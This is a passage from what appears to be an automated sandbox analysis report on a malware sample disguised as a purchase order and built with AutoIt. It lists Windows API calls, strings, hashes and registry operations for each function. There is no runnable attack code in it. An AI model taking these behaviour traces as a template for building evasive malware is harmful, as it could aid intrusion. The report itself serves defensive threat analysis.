                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0030A6FF
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0030A709
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 61ee3ca2602be61e8c91f3bef9f73e5d1ebc724a07e5dcb1afaf88f8e88cb2f4
                        • Instruction ID: e6d5e7aab4ae2a3b61c83fa972881e57d155ea182a0f287caa7718571d4c59a4
                        • Opcode Fuzzy Hash: 61ee3ca2602be61e8c91f3bef9f73e5d1ebc724a07e5dcb1afaf88f8e88cb2f4
                        • Instruction Fuzzy Hash: 74A14B71A10615BFEB15DBA9DC8AFAE7BBDEB04710F108114F615A72E0D7B0AD40CB64
                        Function 002FE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FE45E
                        • GetDriveTypeW.KERNEL32(?,0034DC88,?,\\.\,0034DBF0), ref: 002FE54B
                        • SetErrorMode.KERNEL32(00000000,0034DC88,?,\\.\,0034DBF0), ref: 002FE6B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: b7d202df32ebf58fe2950276eabbf68e9a6c3f3d33bb176cffa2f87befbef076
                        • Instruction ID: eaa3a7e612f6067ce5feba29a35f950c91f7a8473a643ad94221e5d8ae7db2de
                        • Opcode Fuzzy Hash: b7d202df32ebf58fe2950276eabbf68e9a6c3f3d33bb176cffa2f87befbef076
                        • Instruction Fuzzy Hash: 7F51C53023430D9BCA02DF14C891CB9F7A5AEA47C8B528939F616DB1B1D6A0DF65DE42
                        Function 002BC714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-86951937
                        • Opcode ID: adfe954378b1de8e5302b69b596b3ff5872a4d581ae889a74f08d52d4e0ea76f
                        • Instruction ID: f4e317aec30b4a7184945e79242b8c459ced40cdaa846cbcbb1628994c0e9af0
                        • Opcode Fuzzy Hash: adfe954378b1de8e5302b69b596b3ff5872a4d581ae889a74f08d52d4e0ea76f
                        • Instruction Fuzzy Hash: 98612E3166031277DB23BA249C82FFA73ACAF15780F244025FD45AB186EF94DE35DA91
                        Function 00316189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,0034DBF0), ref: 00316245
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                        • API String ID: 3964851224-45149045
                        • Opcode ID: 3a87d5d613b3e316506c5f42bcfa848d7b5fc82040c95b18765ada0393342861
                        • Instruction ID: 13c703835782ba67b046702389f33791a2a3f8af3f4ab3a687b3e90644146a89
                        • Opcode Fuzzy Hash: 3a87d5d613b3e316506c5f42bcfa848d7b5fc82040c95b18765ada0393342861
                        • Instruction Fuzzy Hash: D1C1C6342142018BCB09EF54C452BEE7796AF99394F14896CB8925B3E6CF31DD5ACF82
                        Function 0031D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0031D3BE
                        • SetTextColor.GDI32(?,?), ref: 0031D3C2
                        • GetSysColorBrush.USER32(0000000F), ref: 0031D3D8
                        • GetSysColor.USER32(0000000F), ref: 0031D3E3
                        • CreateSolidBrush.GDI32(?), ref: 0031D3E8
                        • GetSysColor.USER32(00000011), ref: 0031D400
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0031D40E
                        • SelectObject.GDI32(?,00000000), ref: 0031D41F
                        • SetBkColor.GDI32(?,00000000), ref: 0031D428
                        • SelectObject.GDI32(?,?), ref: 0031D435
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0031D454
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0031D46B
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0031D480
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031D4A8
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0031D4CF
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0031D4ED
                        • DrawFocusRect.USER32(?,?), ref: 0031D4F8
                        • GetSysColor.USER32(00000011), ref: 0031D506
                        • SetTextColor.GDI32(?,00000000), ref: 0031D50E
                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0031D522
                        • SelectObject.GDI32(?,0031D0B5), ref: 0031D539
                        • DeleteObject.GDI32(?), ref: 0031D544
                        • SelectObject.GDI32(?,?), ref: 0031D54A
                        • DeleteObject.GDI32(?), ref: 0031D54F
                        • SetTextColor.GDI32(?,?), ref: 0031D555
                        • SetBkColor.GDI32(?,?), ref: 0031D55F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: 458ff96aba961a9fa5558f37cace8fd60493195c933d15d6c023708ab69fdb20
                        • Instruction ID: e3f24f7654ed87d84b2baf37cb27dae1323a65483b809eb6a3f7423791c49c57
                        • Opcode Fuzzy Hash: 458ff96aba961a9fa5558f37cace8fd60493195c933d15d6c023708ab69fdb20
                        • Instruction Fuzzy Hash: 78514C71900208AFDF129FA9EC88EEE7BB9FB09320F214515F925AB2A1D7759940DF50
                        Function 0031B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0031B5C0
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0031B5D1
                        • CharNextW.USER32(0000014E), ref: 0031B600
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0031B641
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0031B657
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0031B668
                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0031B685
                        • SetWindowTextW.USER32(?,0000014E), ref: 0031B6D7
                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0031B6ED
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0031B71E
                        • _memset.LIBCMT ref: 0031B743
                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0031B78C
                        • _memset.LIBCMT ref: 0031B7EB
                        • SendMessageW.USER32 ref: 0031B815
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0031B86D
                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0031B91A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0031B93C
                        • GetMenuItemInfoW.USER32(?), ref: 0031B986
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0031B9B3
                        • DrawMenuBar.USER32(?), ref: 0031B9C2
                        • SetWindowTextW.USER32(?,0000014E), ref: 0031B9EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                        • String ID: 0
                        • API String ID: 1073566785-4108050209
                        • Opcode ID: 5e7dbd69f7b08e5d30c75214bfae3c3d12d0d3c56d028b871d54289d18c4cc4a
                        • Instruction ID: 0efd35d53503f8a7a207568f7f5bd8655e6eab11c821d88a03f8f542704c1cbe
                        • Opcode Fuzzy Hash: 5e7dbd69f7b08e5d30c75214bfae3c3d12d0d3c56d028b871d54289d18c4cc4a
                        • Instruction Fuzzy Hash: FDE18D71900218ABDF269F55CC85EEEBBBDFF09750F108156F919AB290DB708A81CF60
                        Function 0031744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 00317587
                        • GetDesktopWindow.USER32 ref: 0031759C
                        • GetWindowRect.USER32(00000000), ref: 003175A3
                        • GetWindowLongW.USER32(?,000000F0), ref: 00317605
                        • DestroyWindow.USER32(?), ref: 00317631
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0031765A
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00317678
                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0031769E
                        • SendMessageW.USER32(?,00000421,?,?), ref: 003176B3
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003176C6
                        • IsWindowVisible.USER32(?), ref: 003176E6
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00317701
                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00317715
                        • GetWindowRect.USER32(?,?), ref: 0031772D
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00317753
                        • GetMonitorInfoW.USER32 ref: 0031776D
                        • CopyRect.USER32(?,?), ref: 00317784
                        • SendMessageW.USER32(?,00000412,00000000), ref: 003177EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: 762d0ce4e2ca9d2157ae612c5ed97a91bd28584c7328da1ec2b15b5f2b2ac5a8
                        • Instruction ID: 00a0bc0f7fadaac753ca70a881f87afe4d1edb1379ecc29ff96a10a9908916e5
                        • Opcode Fuzzy Hash: 762d0ce4e2ca9d2157ae612c5ed97a91bd28584c7328da1ec2b15b5f2b2ac5a8
                        • Instruction Fuzzy Hash: 4EB1BF71618301AFDB05DF24D885BAABBF5FF88310F048A1DF5999B291DB70E844CB91
                        Function 002CA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002CA839
                        • GetSystemMetrics.USER32(00000007), ref: 002CA841
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002CA86C
                        • GetSystemMetrics.USER32(00000008), ref: 002CA874
                        • GetSystemMetrics.USER32(00000004), ref: 002CA899
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002CA8B6
                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 002CA8C6
                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002CA8F9
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002CA90D
                        • GetClientRect.USER32(00000000,000000FF), ref: 002CA92B
                        • GetStockObject.GDI32(00000011), ref: 002CA947
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002CA952
                          • Part of subcall function 002CB736: GetCursorPos.USER32(000000FF), ref: 002CB749
                          • Part of subcall function 002CB736: ScreenToClient.USER32(00000000,000000FF), ref: 002CB766
                          • Part of subcall function 002CB736: GetAsyncKeyState.USER32(00000001), ref: 002CB78B
                          • Part of subcall function 002CB736: GetAsyncKeyState.USER32(00000002), ref: 002CB799
                        • SetTimer.USER32(00000000,00000000,00000028,002CACEE), ref: 002CA979
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: c68df189f29e69dbe34132a3ba1aa971444643d354182aa3656e8fbc9257c638
                        • Instruction ID: a6eb0907152df92792a4d3ee8a635e57d85e584011c3b22710c67265361c8716
                        • Opcode Fuzzy Hash: c68df189f29e69dbe34132a3ba1aa971444643d354182aa3656e8fbc9257c638
                        • Instruction Fuzzy Hash: EBB19E32A1020AEFDB15DFA8DC86FAD7BB8FB08314F114229FA19A7290D774D851CB51
                        Function 0031352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00313626
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0034DBF0,00000000,?,00000000,?,?), ref: 00313694
                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003136DC
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00313765
                        • RegCloseKey.ADVAPI32(?), ref: 00313A85
                        • RegCloseKey.ADVAPI32(00000000), ref: 00313A92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$ConnectCreateRegistryValue
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 536824911-966354055
                        • Opcode ID: ff2fce530fb96eed41a7bc4cb0e43809a01baae512ee590410e6d8c0880d1c0a
                        • Instruction ID: 72ea48c17352b38aa2ecbebdd075887fd4bbc1f50035d3e3777c3634fe8e8c4e
                        • Opcode Fuzzy Hash: ff2fce530fb96eed41a7bc4cb0e43809a01baae512ee590410e6d8c0880d1c0a
                        • Instruction Fuzzy Hash: E80257752106019FCB19EF24C891EAAB7E9EF88760F05845DF89A9B3A1DB30ED51CF41
                        Function 003169C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00316A52
                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00316B12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                        • API String ID: 3974292440-719923060
                        • Opcode ID: c2162e340b661794a07f33ed324435dcd0b35ccd3e56e973934c253a695d2a86
                        • Instruction ID: 4eb52daf10184dd5a2632a9d71e34c59d9384f33315b428c043928d5d146181f
                        • Opcode Fuzzy Hash: c2162e340b661794a07f33ed324435dcd0b35ccd3e56e973934c253a695d2a86
                        • Instruction Fuzzy Hash: CFA172342642019BCB09EF54C952FAAB3E6EF48354F14896DB8A69B3D2DB30EC55CF41
                        Function 002EDD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 002EDD87
                        • __swprintf.LIBCMT ref: 002EDE28
                        • _wcscmp.LIBCMT ref: 002EDE3B
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002EDE90
                        • _wcscmp.LIBCMT ref: 002EDECC
                        • GetClassNameW.USER32(?,?,00000400), ref: 002EDF03
                        • GetDlgCtrlID.USER32(?), ref: 002EDF55
                        • GetWindowRect.USER32(?,?), ref: 002EDF8B
                        • GetParent.USER32(?), ref: 002EDFA9
                        • ScreenToClient.USER32(00000000), ref: 002EDFB0
                        • GetClassNameW.USER32(?,?,00000100), ref: 002EE02A
                        • _wcscmp.LIBCMT ref: 002EE03E
                        • GetWindowTextW.USER32(?,?,00000400), ref: 002EE064
                        • _wcscmp.LIBCMT ref: 002EE078
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                        • String ID: %s%u
                        • API String ID: 3119225716-679674701
                        • Opcode ID: 0d64d07f8b9e0e283918fe41453c1ee076f2fd95fdbe991f59818a174e6d0930
                        • Instruction ID: 61c900daed1d61e2a0def35490eb2d846701dae20d221793c936c6c4bd2a0c1f
                        • Opcode Fuzzy Hash: 0d64d07f8b9e0e283918fe41453c1ee076f2fd95fdbe991f59818a174e6d0930
                        • Instruction Fuzzy Hash: 21A1F231264747EBDB15DF21C884BAAB7A8FF04350F808529F9A9D3190EB70E925CB91
                        Function 002EE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(00000008,?,00000400), ref: 002EE6E1
                        • _wcscmp.LIBCMT ref: 002EE6F2
                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 002EE71A
                        • CharUpperBuffW.USER32(?,00000000), ref: 002EE737
                        • _wcscmp.LIBCMT ref: 002EE755
                        • _wcsstr.LIBCMT ref: 002EE766
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002EE79E
                        • _wcscmp.LIBCMT ref: 002EE7AE
                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 002EE7D5
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002EE81E
                        • _wcscmp.LIBCMT ref: 002EE82E
                        • GetClassNameW.USER32(00000010,?,00000400), ref: 002EE856
                        • GetWindowRect.USER32(00000004,?), ref: 002EE8BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                        • String ID: @$ThumbnailClass
                        • API String ID: 1788623398-1539354611
                        • Opcode ID: b01b26dcdd86ba5de38eba1f1464ee2bf40f496790baec19611f2eaecf981d9e
                        • Instruction ID: 3efc25aa6971e312c8e3cfb96e278fbf05a2d75034e52203c4ed3eb66c017665
                        • Opcode Fuzzy Hash: b01b26dcdd86ba5de38eba1f1464ee2bf40f496790baec19611f2eaecf981d9e
                        • Instruction Fuzzy Hash: AE81F2310283869BDF01CF11C881FAABBE8FF54354F54846AFD999A096DB30DD65CBA1
                        Function 002EE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wcsnicmp
